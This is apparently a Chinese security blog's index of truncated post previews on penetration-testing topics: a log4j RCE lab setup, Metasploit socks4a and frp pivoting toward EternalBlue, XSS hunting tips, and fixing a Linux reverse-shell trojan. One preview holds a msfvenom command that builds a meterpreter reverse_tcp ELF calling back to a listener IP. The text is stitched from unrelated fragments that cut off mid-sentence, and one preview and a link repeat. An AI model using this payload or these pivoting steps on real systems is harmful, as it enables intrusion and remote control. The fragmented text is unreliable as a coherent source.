0x01-前言昨晚爆出的log4j rce 是通过lookup触发的漏洞，但jdk1.8.191以上默认不支持ldap协议，对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明，我这里还是用jdk1.8.144的版本来运行。0x02-靶场搭建docker 搭建方式docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vu

0x01 前言在攻防演练时，当我们拿下主机时，我们要开始对内网进行渗透，常见的手法有，frp，ew，等代理工具，这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本，好像在使用msf 6的版本一直不成功的样子，所以你们做遇到代理不成功的情况下，可以尝试换个msf 5的版本进行尝试。0x02 生成路由msf操作拓扑图如下首先先生成一个elf 马进行上线 li

0x01 前言这几天我的msf 要生成linux 的木马 一直反弹不成功，用的是以下的paylaodmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf我分析了一下报错，这个报错是没问题的，但生成的木马只有250b ，这明显是不0x02 解决问题我刚

挖掘的方法：1、手工挖掘方法：靠闭合标签加一些限制绕过等等的标签闭合配合浏览器的测试，因为有时候提交的那些表单里面是限制长度的，所以我们可以：（1）用bp进行抓包改包，进行探测。（2）直接在前端修改源代码进行修改长度限制。挖掘验证思路：1、先找数据交互的地方用户输入点、输出点、文件上传地方、flash、在url当中，get的地方，有注入的地方，这...

https://colab.research.google.com/drive/1_Ma71L6uGbtt6UQyA3FjqW2lcZ5Bjck-#scrollTo=uQBR9zXQGJrn

0x01 前言当我们进内网的的时候，会遇到永恒之蓝这种漏洞，之前不懂代理的时候，总是不找到怎么利用，等到我学会了流量代理，frp等工具，才慢慢理解各种协议，各种流量方式的通信方式。初级–》frp代理了解进阶–》多层代理0x02 靶场环境靶场搭建0x03 frp简易配置frp 的配置分为两部分，一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序，下载地址https://g

https://colab.research.google.com/drive/1_Ma71L6uGbtt6UQyA3FjqW2lcZ5Bjck-#scrollTo=uQBR9zXQGJrn

0x01 前言当我们进内网的的时候，会遇到永恒之蓝这种漏洞，之前不懂代理的时候，总是不找到怎么利用，等到我学会了流量代理，frp等工具，才慢慢理解各种协议，各种流量方式的通信方式。初级–》frp代理了解进阶–》多层代理0x02 靶场环境靶场搭建0x03 frp简易配置frp 的配置分为两部分，一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序，下载地址https://g